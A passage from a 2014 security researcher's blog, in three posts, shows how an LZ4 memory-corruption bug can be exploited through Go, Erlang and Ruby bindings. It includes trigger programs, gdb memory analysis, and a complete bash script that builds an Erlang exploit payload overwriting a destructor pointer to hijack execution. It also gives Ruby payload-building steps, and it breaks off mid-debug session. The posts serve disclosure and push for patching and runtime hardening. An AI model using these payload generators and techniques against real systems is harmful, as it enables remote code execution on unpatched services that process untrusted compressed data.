Friday, July 11, 2014

Bla Bla LZ4, Bla Bla GoLang Or Whatever

I Was Coerced 

A lot of people don't know this, but I've known Jaime Cochran for almost fifteen years. We've been friends as long as I've been on the Internet. So, when she jabbed me earlier tonight saying "Hey, why the hell haven't you looked at GoLang yet?", my first reaction was obviously "Kiss off". My second reaction was "fine, I guess I should at least search around". 

As it turns out, CloudFlare (who I actually like quite a bit), has a vulnerable GoLang package on github that has been fairly popular. Last night I poked around a bit and got silly with the Go Stuffs. The result was the following source file:

package main

import (
        "io/ioutil"
        "golz4"
        "fmt"
)

func main() {
        input, err := ioutil.ReadFile("/home/x/lz4/go.lz4")
        if err != nil {
                fmt.Printf("failed: %#v\n", err)
        }

        output := make([]byte, (17 * 1024 * 1024))
        err = lz4.Uncompress(input, output)
        if err != nil {
                fmt.Printf("failed: %#v\n", err)
        }
}

Using this little beauty with CloudFlare's package resulted in the following Fun Times (TM). Note that I'm not even changing the contents of the mklz4.sh payload, I'm only adjusting the offset a bit. More details on this later. 

donb@debian:~$ ./donblz4
fatal error: unexpected signal during runtime execution
[signal 0xb code=0x2 addr=0x2 pc=0x804bf11]

runtime stack:
runtime: unexpected return pc for runtime.sigpanic called from 0x804bf11
runtime.throw(0x8160045)
        /home/x/lib/src/go/go/src/pkg/runtime/panic.c:520 +0x71
runtime: unexpected return pc for runtime.sigpanic called from 0x804bf11
runtime.sigpanic()
        /home/x/lib/src/go/go/src/pkg/runtime/os_linux.c:222 +0x46
... and so on ...

Well because I have had just about enough of this LZ4 hacking crap, I was ready to call it a night. But, Ben Nagy (who I once got drunk with in Singapore, surprise, surprise) asked me to investigate a bit further. Why? He's interested in using this as an example to push for GoLang run-time hardening. I'm Pro-Ben (I honestly haven't given much thought to run-time hardening in Go ;-)) so I figured I'd help out. 

I really have no idea whether people will care or listen to these details, or whether they'll even help with run-time hardening. But, what the heck, right? Let's try and Do Some Good, anyway. 


Quick and Dirty

So the point of this is not necessarily to gain RCE, but to prove that RCE is possible. This is because libraries like CloudFlare's LZ4 package, like the other tests I've been performing against LZ4, are out of application context. Because of GoLang's memory layout, I cannot (in this short amount of time) develop a guaranteed one-shot RCE like I can for Erlang and Python. 

But, attacking GoLang is much more profitable than Ruby. With Ruby, you never know where your memory chunk will end up in RAM and you never know whether there is a valid page prior to that chunk. In GoLang, things are much, much simpler. 

(gdb) where
#0  LZ4_decompress_fast (source=0x18336000 "\017", dest=0x19348000 "", outputSize=17825792)
    at /home/donb/go/src/golz4/src/lz4.c:823
#1  0x0804c212 in LZ4_uncompress (outputSize=, dest=,
    source=) at /home/donb/go/src/golz4/src/lz4.h:193
#2  _cgo_e56f7980f8b8_Cfunc_LZ4_uncompress (v=0xb7d3eea4) at /home/donb/go/src/golz4/lz4.go:50
#3  0x08072125 in runtime.asmcgocall () at /home/donb/lib/src/go/go/src/pkg/runtime/asm_386.s:624
#4  0xb7d3eea4 in ?? ()

After loading up 'donblz4' and breaking at LZ4_decompress_fast, the function called by the GoLang bindings, we see the above call trace. All we really need to look at is the variable dest, which identifies the address at which the decompression payload will be stored. This is the address from which memory corruption will occur. So, the most likely memory segment to corrupt will be the one this address resides in. 

Unlike Ruby, which uses Linux's standard glibc heap for new memory buffers/Objects, GoLang uses a completely separate memory segment. It creates a memory map that is Read and Write only. We can easily spot this by checking the process's memory mapping. 

 
(gdb) info inferiors
  Num  Description       Executable
* 1    process 8291      /home/donb/donblz4
(gdb) ^Z
[2]+  Stopped                 gdb -q donblz4
donb@debian:~$ cat /proc/8291/maps
08048000-0815f000 r-xp 00000000 fd:00 122015     /home/donb/donblz4
0815f000-0816f000 rw-p 00116000 fd:00 122015     /home/donb/donblz4
0816f000-081a4000 rw-p 00000000 00:00 0          [heap]
08200000-08205000 rw-p 00000000 00:00 0
08205000-17ec0000 ---p 00000000 00:00 0
17ec0000-1a500000 rw-p 00000000 00:00 0
1a500000-38302000 ---p 00000000 00:00 0

Obviously, the address at which dest points does not fall within the standard heap. As suggested above, there is an entirely separate memory chunk. What's great about this chunk is it isn't just allocated for our large LZ4 decompression payload. And, even if it were, it isn't the only type of data that lives there. 

Scanning around that chunk of memory we can easily determine whether function addresses reside here, and whether they will sit at predictable offsets in RAM. 

I generated a simple gdb script to identify addresses within memory that fit with the 'donblz4' executable regions

define scanlz4

        set $x = ($arg0)
        set $y = ($arg1)
        set $x_start = ($arg2)
        set $x_end = ($arg3)

        while $x < $y
                if *(unsigned int * )$x >= $x_start && *(unsigned int * )$x < $x_end
                        printf "%.08x: found value %.08x \n", $x, *$x
                end
                set $x += 4
        end

end

Using the above script, even for our tiny do-nothing test executable, revealed over 50 results within the same chunk of memory as our dest buffer. 

(gdb) scanlz4 0x183000e0 0x1a500000 0x08048000 0x0815f000
183000ec: found value 0807353a 
18300124: found value 080fa3b8 
18300144: found value 080fa3d8 
18300164: found value 080fa398 
18300184: found value 080fe278 
183020b8: found value 08072109 
183020d4: found value 08050a7a 
18302130: found value 08070be2 
18302298: found value 08051474 
183022b4: found value 08051474 
18302310: found value 0805cc20 
18302338: found value 0805f204 
183023b0: found value 08055ee0 
183023d8: found value 0805f204 
18302450: found value 08055ee0 
183026f8: found value 0805f4b0 
18302714: found value 0805f4b0 
18304004: found value 080f2880 
18304064: found value 080ecc81 
^CQuit

We can easily see that these addresses point to actual function addresses by inspecting the symbol at each offset. 

(gdb) x/8i 0x0807353a
   0x807353a :   pop    %ecx
   0x807353b :   pop    %ecx
   0x807353c :   test   %eax,%eax
   0x807353e :   jne    0x80735de
   0x8073544 :   mov    0x2c(%esp),%ebx
   0x8073548 :   mov    %ebx,(%esp)
   0x807354b :   mov    0x6c(%esp),%ebx
   0x807354f :   mov    %ebx,0x4(%esp)

So now that we know where a bunch of function addresses are, we can really just adjust the LZ4 payload I've been using in all of my blog posts to spam 0x11223344 at a chunk of memory that has a high concentration of known function pointers. 

Doing so demonstrates that these function pointers can be corrupted in a reliable fashion. What I end up controlling, however, are separate threads than the main one that LZ4 is executing within. In fact, the entire LZ4 payload hasn't even finished writing by the time the memory corruption triggers a SIGSEGV in another thread. 

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb743bb70 (LWP 8295)]
0x11223344 in ?? ()
(gdb) info threads
  Id   Target Id         Frame
  4    Thread 0xb6c3ab70 (LWP 8296) "donblz4" 0x0804c00d in LZ4_decompress_generic (targetOutputSize=0,
    partialDecoding=0, prefix64k=1, endOnInput=0, outputSize=17825792, inputSize=0, dest=0x19348000 "",
    source=0x18336000 "\017") at /home/donb/go/src/golz4/src/lz4.c:759
* 3    Thread 0xb743bb70 (LWP 8295) "donblz4" 0x11223344 in ?? ()
  2    Thread 0xb7d3cb70 (LWP 8294) "donblz4" _fallback_vdso ()
    at /home/donb/lib/src/go/go/src/pkg/runtime/rt0_linux_386.s:21
  1    Thread 0xb7e4d6d0 (LWP 8291) "donblz4" _fallback_vdso ()
    at /home/donb/lib/src/go/go/src/pkg/runtime/rt0_linux_386.s:21
(gdb)

So, there we have it. Because the dest buffer resides in the same memory chunk as function pointers, and there are no guard pages to hinder memory corruption, I have the ability to overwrite objects in memory that affect other threads. 

All in all, this is pretty Good Times. I'm glad Jaime and Ben pushed me to bother with this because otherwise I would have just closed out with Erlang. Three remote RCE capable languages with LZ4 is pretty sick, though, and was deserving of my time. 

Summary

So now we know that RCE can be achieved in GoLang. However, there are caveats
  • Unlike Erlang and Python, memory layout isn't guaranteed
  • The entire "compressed" LZ4 payload may proceed anything important (must jump over)
  • This means that (for now) there is no universal one-shot exploit for GoLang via LZ4
  • A Function-Spray doesn't necessarily cause a SIGSEGV before the pointer is executed
  • This is sufficient evidence for improvement (hardening) of the GoLang runtime
  • CloudFlare, please update your LZ4 repo
Best,
Don A. Bailey
Founder / CEO
Lab Mouse Security
@InfoSecMouse
https://www.securitymouse.com/

Thursday, July 10, 2014

A Final LZ4 Act - Hacking Erlang

Killing Money

I've been getting a lot of emails, DMs, PMs, etc, congratulating me on my perseverance through the P.R. mess that has been the LZO/LZ4 bugs. Thanks for your support! But, let's be realistic, I've really just been killing money. 

The amount of engineering effort that it takes to "prove" something vulnerable with an exploit is an often unnecessary add-on to a bug report. We're talking about potentially thousands of dollars in consulting hours lost due to efforts that shouldn't be required in the first place. When a bug is reported and has been fixed, that's all that should be required to say "hey, we should patch this". 

I think the information security industry is failing itself, its clients, and the general Internet community when we waste time asking people to "prove it with code". If the bug report is sufficiently elaborate, then perhaps time is better spent patching and moving on with it. 

I chose to "prove it with code" because first of all I don't like to lose. I'm not going to lie, a lot of it was about the selfish need to prove myself right. But, I also did it because it's my job. I released these bugs in the first place because it was the right thing to do, and as an information security consultant, my job is to try and make the Internet safer. 

So, by spending thousands of dollars in lost consulting time, I'm hoping to have saved a few companies out there hundreds of thousands of dollars in remediation, forensics, and engineering time, chasing down adversaries and critical bugs that could end up costing a lot more than just money.

With that said, I've had enough of this LZ4 bug. It was fun, but I've made my point. 

Writing Twice In A Write-Once Language

Attacking Erlang as a language is fun times. Why? Because in the Erlang virtual machine only allows objects to be written to once. Each variable in the Erlang language can only be written at instantiation. If you want to write to that variable again, to darn bad. The VM forbits it. Just check out the simple example below. For those that aren't familiar with Erlang, run "apt-get install erlang" on a 32bit machine (my test environment as always is x86 32bit Debian 7.5.0). 

Erlang/OTP 17 [erts-6.1] [source] [async-threads:10] [hipe] [kernel-poll:false]

Eshell V6.1  (abort with ^G)
1> Variable = "Hello".         
"Hello"
2> Variable.
"Hello"
3> Variable = "Lol".
** exception error: no match of right hand side value "Lol"
4> 

In the above example we can see that the erlang command line "erl" allows us to set variables, similar to Python's command line. The only difference here is that you can only do so once. Further writes to the variable require deletion of said variable. This is because in Erlang's pattern matching system, the right side of an expression must always equal the left side, unless the left side has not yet been defined. 

This is amazing for pattern matching functionality, and is part of the elegance of a functional language such as Erlang, Haskell, etc. 

I, personally, am a big fan of Erlang, and write a lot of code in it. I recently wrote a fuzzer for DNP3 for no other reason than to see if I could. I did. It was fun. 

What isn't fun is attacking Erlang because of the nature of the language depicted above. It's not easy to mangle objects in memory when you can't alter them after the fact. 

Oh, LZ4, You Slay Me^H^HErlang

But, that's where the beauty of an elegant bug like the LZ4 memory corruption flaw comes in. In order to use LZ4's optimized library, it's best to call into it from the Erlang language. To do this, a Native Implemented Function must be constructed. This is basically the Erlang equivalent to Ruby or Python bindings that connect Erlang's language to an existing shared library. 

What this means is, by calling the LZ4 Erlang module from within Erlang, we are actually talking to the LZ4 C library through a binding interface. This gives us an opportunity to attack the decompression function in the same way we would for any other system. 

What's even better about this simple functionality is that because the variable we define with the decompressed data is set after the data has been decompressed, we are essentially corrupting an Object in memory as it is being instantiated

Note: The maintainer of the erlang-lz4 nif is smart and quick. They updated the erlang-lz4 package before I had a chance to get to it, so kudos to szktty. If you want to play with a vulnerable release of his code, please clone the repository at github and then check out version 0.1.1

To start off, let's take a look at how the NIF bindings work. You can follow along here

static ERL_NIF_TERM
nif_uncompress(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
  ERL_NIF_TERM ret_term;
  ErlNifBinary src_bin, res_bin;
  long res_size;

  if (!enif_inspect_binary(env, argv[0], &src_bin) ||
      !enif_get_long(env, argv[1], &res_size))
    return 0;

  enif_alloc_binary((size_t)res_size, &res_bin);

  if (LZ4_uncompress((char *)src_bin.data, (char *)res_bin.data,
        res_bin.size) >= 0) {
    ret_term = enif_make_tuple2(env, atom_ok,
        enif_make_binary(env, &res_bin));
    enif_release_binary(&res_bin);
    return ret_term;
  } else {
    enif_release_binary(&res_bin);
    return enif_make_tuple2(env, atom_error, atom_uncompress_failed);
  }
}

In the above code, we can see how the Native Implemented Function handles a call to lz4:uncompress(). The first argument is the data to be decompressed, and the second argument is the size of the buffer that the data will be decompressed into. 

This decompression buffer is essentially the variable, even though no variable has yet been assigned to. Why is this? Remember that variables are set once in Erlang, so once an object has been created in memory, it's done. That's it. No more mangling. If that object must be altered in any way, a new instantiation is used - not the object that was originally created. Therefore, we have to focus on corrupting the object as it is initially decompressed. 

In the above example, we can see that res_bin is the object (ErlNifBinary) that is created as the object containing the destination buffer data. The size of the destination buffer, as I mentioned a moment ago, is passed in as the second argument to lz4:uncompress(). Let's ignore for a moment that the author of the erlang-lz4 nif ignores the allocator return value and focus on the contents of enif_alloc_binary.

int enif_alloc_binary(size_t size, ErlNifBinary* bin)
{
    Binary* refbin;

    refbin = erts_bin_drv_alloc_fnf(size); /* BUGBUG: alloc type? */
    if (refbin == NULL) {
        return 0; /* The NIF must take action */
    }
    refbin->flags = BIN_FLAG_DRV; /* BUGBUG: Flag? */
    erts_refc_init(&refbin->refc, 1);
    refbin->orig_size = (SWord) size;

    bin->size = size;
    bin->data = (unsigned char*) refbin->orig_bytes;
    bin->bin_term = THE_NON_VALUE;
    bin->ref_bin = refbin;
    return 1;
}

As can be seen above (or here on github), enif_alloc_binary creates a Binary object in memory, which contains the actual allocated memory buffer orig_bytes. ErlNifBinary is simply a container for the Binary object, allowing for a semblance of inheritance in C, similar to PyObject variants in Python. 

So, all we really need to understand here is the layout of a Binary in memory, since that is where the decompression payload actually resides. 

typedef struct binary {
    ERTS_INTERNAL_BINARY_FIELDS
    SWord orig_size;
    char orig_bytes[1]; /* to be continued */
} Binary;

Here, we can see that the allocated object is defined almost exactly like objects in Python. For dynamic behavior, the structure's last value is an array of [1], implying that when this object is allocated in memory, any excess bytes allocated can be referenced at &orig_bytes[0], making Binary a dynamic object. This is the same methodology used in Python, and many other projects that require a semblance of classes, inheritance, or polymorphism in the C language. 

Since we know that our decompression buffer will point to &orig_bytes[0], we now know that we can use the LZ4 memory corruption bug to overwrite previous fields in the Binary object with little effort. So, let's take a look at those fields. 

#define ERTS_INTERNAL_BINARY_FIELDS   \
    UWord flags;                      \
    erts_refc_t refc;                 \
    ERTS_BINARY_STRUCT_ALIGNMENT

In the same file on github, just above the Binary structure definition, we see the Macro above. Including the structure variable orig_size, there are three other objects in memory before orig_bytes. The flags integer, a reference counter refc, and a padding structure on 32bit systems. All four of these variables are 32bit on a 32bit architecture, meaning that if we point our memory corruption to 16 bytes prior to the start of the decompression buffer, we can overwrite them all. 

Now, you might be saying to yourself "Don, but why would we bother? Is this a crappy exploit scenario like with Ruby? Are we just corrupting the header and going home?" That's a fair question, my friend. But, remember, Erlang isn't a crappy programming language like Ruby. You can do real things in Erlang besides building Metasploit modules. It's used for real world applications. So, of course you can get more functionality out of an exploit in Erlang! It's a functional language!

Polymorphism's A Bitch

Now the great thing about the Binary object is that it's destructed at some point, just like any self respecting garbage collected virtual machine would do. This means that something, at some point, has to inspect the Binary object. Let's see how that works by looking at the NIF again

  if (LZ4_uncompress((char *)src_bin.data, (char *)res_bin.data,
        res_bin.size) >= 0) {
    ret_term = enif_make_tuple2(env, atom_ok,
        enif_make_binary(env, &res_bin));
    enif_release_binary(&res_bin);
    return ret_term;
  } else {
    enif_release_binary(&res_bin);
    return enif_make_tuple2(env, atom_error, atom_uncompress_failed);

Remember the code above? If LZ4 decompression returns with an error, a call is immediately made to enif_release_binary. This seems familiar! This is almost exactly how the Python bindings react to a failure in LZ4. Huh! Go figure! enif_release_binary is called whether LZ4_uncompress returns an error or not, but in the case of failure, it's called immediately. This looks more promising, so let's check it out. 

void enif_release_binary(ErlNifBinary* bin)
{
    if (bin->ref_bin != NULL) {
        Binary* refbin = bin->ref_bin;
        ASSERT(bin->bin_term == THE_NON_VALUE);
        if (erts_refc_dectest(&refbin->refc, 0) == 0) {
            erts_bin_free(refbin);

Back in the erl_nif.c file we can see that our corrupted Binary within the ErlNifBinary is immediately tested and passed to erts_bin_free. There are two very important things to note here
  • The reference count in Binary is decremented, then tested for zero
  • erts_bin_free is simply passed the entire Binary structure
The first point is important because this immediately tells us that refc must be overwritten with 0x00000001 in order to make a call to erts_bin_free. The second point is the most important point: erts_bin_free doesn't know anything about our ErlNifBinary. This means that this is a generic memory destruct function, which also means that due to the polymorphic behavior of the virtual machine, it must presume that the dynamically allocated data should be interpreted somehow.... 

ERTS_GLB_INLINE void
erts_bin_free(Binary *bp)
{
    if (bp->flags & BIN_FLAG_MAGIC)
        ERTS_MAGIC_BIN_DESTRUCTOR(bp)(bp);
    if (bp->flags & BIN_FLAG_DRV)
        erts_free(ERTS_ALC_T_DRV_BINARY, (void *) bp);
    else
        erts_free(ERTS_ALC_T_BINARY, (void *) bp);
}

Bingo! We've got lift off. In the erl_binary.h file we can see that erts_bin_free does indeed attempt to interpret the type of binary it is passed. If the flag variable is set to BIN_FLAG_MAGIC (0x01) then a destructor function that resides in Binary is called. Awesome! But, our Binary isn't defined as a MAGIC object! So what! Just overwrite the flag variable with 0x00000001, and you're good to go. 

MAGIC Happens

All that is left now is to evaluate what the structure looks like when it is interpreted as MAGIC. Oh, it is MAGIC indeed. Let's go back to global.h to inspect the proper structure. 

typedef struct {
    ERTS_INTERNAL_BINARY_FIELDS
    SWord orig_size;
    void (*destructor)(Binary *);
    char magic_bin_data[1];
} ErtsMagicBinary;

Oh, well isn't that perfect. The offset where we would normally have correctly decompressed data in a Binary structure (at the variable origbytes[1]) contains a function pointer destructor in ErtsMagicBinary

Well isn't that convenient! 

This means that our payload will essentially contain the BIN_FLAG_MAGIC value, followed by a reference count of 0x00000001, followed by 32bits of padding, followed by the original size value (any will do), followed by a function pointer. With this payload, we win. 

Let's try it. Here is a simple Erlang program to call lz4:uncompress() with data from a payload file. 

-module(donb).
-export([
        doit/1]).

doit(File) -> 
        io:format("doit!~n"),
        case file:read_file(File) of
                {ok, B} ->
                        X = attack(B),
                        {ok, X};
                {error, R} ->
                        {error, file:format_error(R)}
        end.

attack(B) ->
        R = lz4:uncompress(B, 16#00100000),
        io:format("uncompress returned ~w~n", [R]).

Compile the file 'donb.erl' in Erlang using c(donb). Then, simply test it with the payload I described above. Adjustments to the Python payload from my previous blog post will do. The offset is the same. 

donb@debian$ /usr/local/bin/erl -noshell -run donb doit ~/lz4/erlang.lz4 -s init stop
doit!
Segmentation fault (core dumped)
donb@debian$ gdb -q /usr/local/lib/erlang/erts-6.1/bin/beam core
Reading symbols from /usr/local/lib/erlang/erts-6.1/bin/beam...done.
[New LWP 591]
[New LWP 595]
[New LWP 596]
[New LWP 597]
[New LWP 598]
[New LWP 599]
[New LWP 600]
[New LWP 601]
[New LWP 602]
[New LWP 603]
[New LWP 604]

warning: Can't read pathname for load map: Input/output error.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
Core was generated by `/usr/local/lib/erlang/erts-6.1/bin/beam -- -root /usr/local/lib/erlang -prognam'.
Program terminated with signal 11, Segmentation fault.
#0  0xdeadca75 in ?? ()
(gdb) 

And there you have it. The elegance of polymorphism in C once again allows us to turn Binary into MAGIC and end up with Remote Code Execution with only one single integer overflow. Attacking a language that doesn't even let you write to variables multiple times is a win with LZ4 corruption. 

Isn't that a beautiful thing? I think so. 

Best,
Don A. Bailey
Founder / CEO
Lab Mouse Security
@InfoSecMouse
https://www.securitymouse.com/

#!/bin/bash
#
# Erlang LZ4 exploit (should work for all OTP vers) - donb@securitymouse.com
# Works for versions of erlang-lz4 prior to 2x
# For testing only. Do not misuse.
#

FILE=./erlang.lz4

append()
{
        printf $1 >> $FILE
}

init()
{
        rm -f $FILE
        touch $FILE
}

large()
{
        x="\"\\xff\" x $1"
        perl -e "print $x" >> $FILE
}

append_size()
{
        i=0
        while [ $i -lt $1 ]; do
                append $2
                i=$((i+1))
        done
}

# initialize the file
init

# simple literal run; no mask
append "\x0f"

# copy the fifteen bytes and embed a null ref
# the second mask must be embedded here as well
# note that the second mask starts at the first 0xff
append "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

# goal is 0xfffffff0
# now we need (16843008 - 13) 0xff bytes
large 16842995
append "\xdd"

# Binary structure overwrite
# we need 76 bytes but for more than 15 we need a mask
append "\xf0\x39"

# append the ob_type
append "\x01\x00\x00\x00"       # BIN_FLAG_MAGIC
append "\x01\x00\x00\x00"       # refcount
append "\x00\x00\x10\x00"       # orig_size
append "\xde\xad\xca\x74"       # padding(?)
append "\x75\xca\xad\xde"       # destructor
append "\xde\xad\xca\x79"       # magic bin data
append "\xde\xad\xca\x7a"       #
append "\xde\xad\xca\x75"       #
append "\xde\xad\xca\x76"       #
append "\xe0\x6f\x2c\x08"       #
append "\x00\x00\x00\x00"       #
append "\x00\x00\x00\x00"       #
append "\x00\x00\x00\x00"       #
append "\x00\x00\x00\x00"       #
append "\x00\x00\x00\x00"       #
append "\x00\x00\x00\x00"       #
append "\x00\x00\x00\x00"       #
append "\x00\x00\x00\x00"       #

# now finish with a bad reference
append "\xff\xff"

Wednesday, July 9, 2014

The LZ4-Ruby Two Hour Challenge

I'm a Ruby Virgin

So, I never found Ruby all that intriguing. It's just not that exciting to me. Sure, I can audit your Ruby on Rails app, but have I ever delved into the internals of Ruby to attack the language, itself? Nope. Not even remotely interested. 

Until today! 

I noticed that Ruby's lz4-ruby package is still vulnerable to the LZ4 memory corruption bug. Since this variant uses the LZ4_decompress_safe routine, I thought it was time to finally dive into the disgusting cesspool that is Ruby. 

I downloaded the latest RVM to my 32bit Debian 7.5.0 test-bed and went for a Polar Bear plunge. After installing the latest version of Ruby (2.1.2p95 2014-05-08 revision 45877) I went to work. 

Having a lot to do today, I only had two hours free to build and write up an attack for this platform. I'm still on the clock, so let's see how much info I can spill in the few minutes I have left. 

To follow along and install the ruby gem, simply run 

$ gem install lz4-ruby 

Once installed, you'll find that the gem can be referenced easily from the Ruby command line "irb". Since irb is horrible, we'll just throw together a quick little script. I'm using the payload from my Python attack as a starting point, so feel free to browse to the script embedded in that blog post in another tab. 

require 'lz4-ruby'

puts "ruby lz4 exploit - donb@securitymouse.com"

f = File.open("./ruby.lz4", "r")
d = f.read
f.close

$i = 0
while $i < 3 do
        puts "."
        sleep(1)
        $i += 1
end

LZ4::uncompress(d)

Above is the script I'm using to open and pass my payload to lz4-ruby's uncompress routine. This routine eventually calls our dear old friend LZ4_decompress_safe, which should be invulnerable to our attack! 

donb@debian:~/lz4$ ruby ./test.rb
ruby lz4 exploit - donb@securitymouse.com
.
.
.
/home/donb/.rvm/gems/ruby-2.1.2/gems/lz4-ruby-0.3.2/lib/lz4-ruby.rb:28:in `uncompress': Compressed data is maybe corrupted. (LZ4Internal::Error)
        from /home/donb/.rvm/gems/ruby-2.1.2/gems/lz4-ruby-0.3.2/lib/lz4-ruby.rb:28:in `decompress'
        from /home/donb/.rvm/gems/ruby-2.1.2/gems/lz4-ruby-0.3.2/lib/lz4-ruby.rb:36:in `uncompress'
        from ./test.rb:16:in `

'

Aw, crap! So, I guess it's not vulnerable right off the bat. Analyzing the Ruby bindings shows that there is a funny little attribute of the Ruby platform that is screwing up our attack.

static VALUE lz4internal_uncompress(VALUE self, VALUE input, VALUE in_size, VALUE offset, VALUE out_size) {
  const char *src_p;
  int src_size;

  int header_size;

  VALUE result;
  char *buf;
  int buf_size;

  int read_bytes;

  Check_Type(input, T_STRING);
  src_p = RSTRING_PTR(input);
  src_size = NUM2INT(in_size);

  header_size = NUM2INT(offset);
  buf_size = NUM2INT(out_size);

  result = rb_str_new(NULL, buf_size);
  buf = RSTRING_PTR(result);

  read_bytes = LZ4_uncompress_unknownOutputSize(src_p + header_size, buf, src_size - header_size, buf_size);
  if (read_bytes < 0) {
    rb_raise(lz4_error, "Compressed data is maybe corrupted.");
  }

  return result;
}

The function above is the Ruby version of the LZ4 bindings, which you can view here on github. Notice the call to 'header_size'. Oddly enough, the Ruby LZ4 bindings have their own concept of a header, which is entirely different to the four byte little-endian header used by every other package (including Python). 

Even more amusing is the fact that the size of the output buffer is a part of the header. The header size is defined by the number of signed bytes at the start of the payload. This is because Ruby is interpreting this value in the payload as a Ruby Integer. This means for each byte with the sign bit set (0x80) it will presume the subsequent byte in the payload is a part of the integer value to be constructed. This is a very common (but annoying) sequence that anyone familiar with ASN.1/etc will recognize instantly. 

So, to tell the Ruby bindings how much string memory to allocate, we simply stuff a large integer into the header of our payload. Because I don't really care about this value and just want a large enough buffer for my payload, I threw in some random crap (mostly due - again - to time). 

donb@debian:~/lz4$ printf "\x80\x81\x82\x7f" > ruby_header.lz4
donb@debian:~/lz4$ cat ruby_header.lz4 test.lz4 > ruby.lz4

Unfortunately, this also fails. Why? Because the LZ4_decompress_safe routine does have one extra check that the LZ4_uncompress function Python uses does not have. It validates that the length of the data to be copied does not exceed the size of the input buffer. We exceed it by just a few bytes in my Python payload, which doesn't matter because of the way LZ4 parses the data. But, the check is a small bump in the road, so we want to avoid it. 

To do so, simply create a footer file that gives us ample room to overwrite whatever the heck we want. As a simple example, I just created an 8k file composed of the letter 'x'.

donb@debian:~/lz4$ perl -e 'print "x" x 8192' > footer.lz4


Crashing LZ4_decompress_safe

So, now we can construct the appropriate payload and be on our way. For simplicity, I adjusted my mklz4.sh file to construct the payload "ruby.lz4" by concatenating the header, body, and footer within the script. 

donb@debian:~/lz4$ ./mklz4.sh 
donb@debian:~/lz4$ ruby ./test.rb
ruby lz4 exploit - donb@securitymouse.com
.
.
.
/home/donb/.rvm/gems/ruby-2.1.2/gems/lz4-ruby-0.3.2/lib/lz4-ruby.rb:28: [BUG] Segmentation fault at 0xa5afeff8
ruby 2.1.2p95 (2014-05-08 revision 45877) [i686-linux]

Excellent! That's a great start. Let's spin up gdb and see why we're segfaulting. Now, you might have asked yourself "why did he put the while loop with the sleep in the Ruby script?". Now you'll know. 

Because Ruby loads libraries dynamically based on the 'require' statement, this is just a simple way of breaking in the debugger at a point when all requisite libraries should have been loaded. That way, I can simply break in gdb, adjust my next breakpoint, and be on my way. 

donb@deban:~/lz4$ gdb -q `which ruby`
Reading symbols from /home/donb/.rvm/rubies/ruby-2.1.2/bin/ruby...done.
(gdb) run test.rb
Starting program: /home/donb/.rvm/rubies/ruby-2.1.2/bin/ruby test.rb
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
[New Thread 0xb7936b70 (LWP 7161)]
ruby lz4 exploit - donb@securitymouse.com
.
.
.
^C
Program received signal SIGINT, Interrupt.
0xb7fe1430 in __kernel_vsyscall ()
(gdb) break LZ4_decompress_safe
Breakpoint 1 at 0xb7d19fc0: file lz4.c, line 850.
(gdb) c
Continuing.

Breakpoint 1, LZ4_decompress_safe (source=source@entry=0xb590800c "\017", dest=0xa5aff008 "", 
    inputSize=inputSize@entry=16851314, maxOutputSize=266371330) at lz4.c:850
850     {
(gdb) 

As you can see above, I simply insert a breakpoint for LZ4_decompress_safe and go on about my business. But, we can notice something is wrong right off the bat. The address in memory passed to the decompression routine as a destination is a bit too "even" for my taste. 

Usually when I see a pointer passed to a function that is an offset of PAGE_SIZE plus eight bytes, I know I'm in the Linux heap. This is a bad thing because the Linux heap is harder to exploit these days than ever. The only realistic attacks that can occur when instrumenting the Linux heap is an attack against the application's logic. And to do this, you'd have to align two pages close together in a predictable way. This requires memory pressure and a lot of other b.s. that I am not going to get into here. 

(gdb) x/8xw dest 
0xa5aff008:     0x00000000      0x00000000      0x00000000      0x00000000
0xa5aff018:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) x/8xw dest - 8
0xa5aff000:     0x00000000      0x0fe09002      0x00000000      0x00000000
0xa5aff010:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) x/8xw dest - 16
0xa5afeff8:     Cannot access memory at address 0xa5afeff8
(gdb) 

A few simple tests show that I'm right. Valid memory stops at the start of this page. Since we are using a test application, nothing will be in memory prior to that page. 

So, for fun, let's simply corrupt the header of the heap chunk just to prove we can do it reliably. This may not be useful on Linux, but there are a lot of other platforms where this is useful. Remember, Ruby is a high level language and is implemented on a lot of different platforms. So, depending on your target, Your Mileage May Vary. 

To overwrite just the header and not cause a SIGSEGV by writing to an invalid memory page, just increase the address offset in mklz4.sh by 8 bytes. This will start the copy of our data at the beginning of the heap chunk, rather than 8 bytes prior to the start of the heap chunk's valid page. 

donb@debian:~/lz4$ ./mklz4-ruby.sh 
ruby payload is ready
donb@debian:~/lz4$ !gd
gdb -q `which ruby`
Reading symbols from /home/donb/.rvm/rubies/ruby-2.1.2/bin/ruby...done.
(gdb) run ./test.rb
Starting program: /home/donb/.rvm/rubies/ruby-2.1.2/bin/ruby ./test.rb
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
[New Thread 0xb7936b70 (LWP 7358)]
ruby lz4 exploit - donb@securitymouse.com
.
.
^C
Program received signal SIGINT, Interrupt.
0xb7fe1430 in __kernel_vsyscall ()
(gdb) break LZ4_decompress_safe
Breakpoint 1 at 0xb7d19fc0: file lz4.c, line 850.
(gdb) c
Continuing.
.
Breakpoint 1, LZ4_decompress_safe (source=source@entry=0xb590800c "\017", dest=0xa5aff008 "", 
    inputSize=inputSize@entry=16851314, maxOutputSize=266371330) at lz4.c:850
850     {
(gdb) x/8xw 0xa5aff000
0xa5aff000:     0x00000000      0x0fe09002      0x00000000      0x00000000
0xa5aff010:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) where
#0  LZ4_decompress_safe (source=source@entry=0xb590800c "\017", dest=0xa5aff008 "", 
    inputSize=inputSize@entry=16851314, maxOutputSize=266371330) at lz4.c:850
#1  0xb7d1b9ac in LZ4_uncompress_unknownOutputSize (maxOutputSize=, isize=16851314, 
    dest=, source=0xb590800c "\017") at lz4.h:245
#2  lz4internal_uncompress (self=137898400, input=137896980, in_size=33702637, offset=9, 
    out_size=532742661) at lz4ruby.c:151
#3  0xb7ee24ad in call_cfunc_4 (func=0xb7d1b8f0 , recv=137898400, argc=4, 
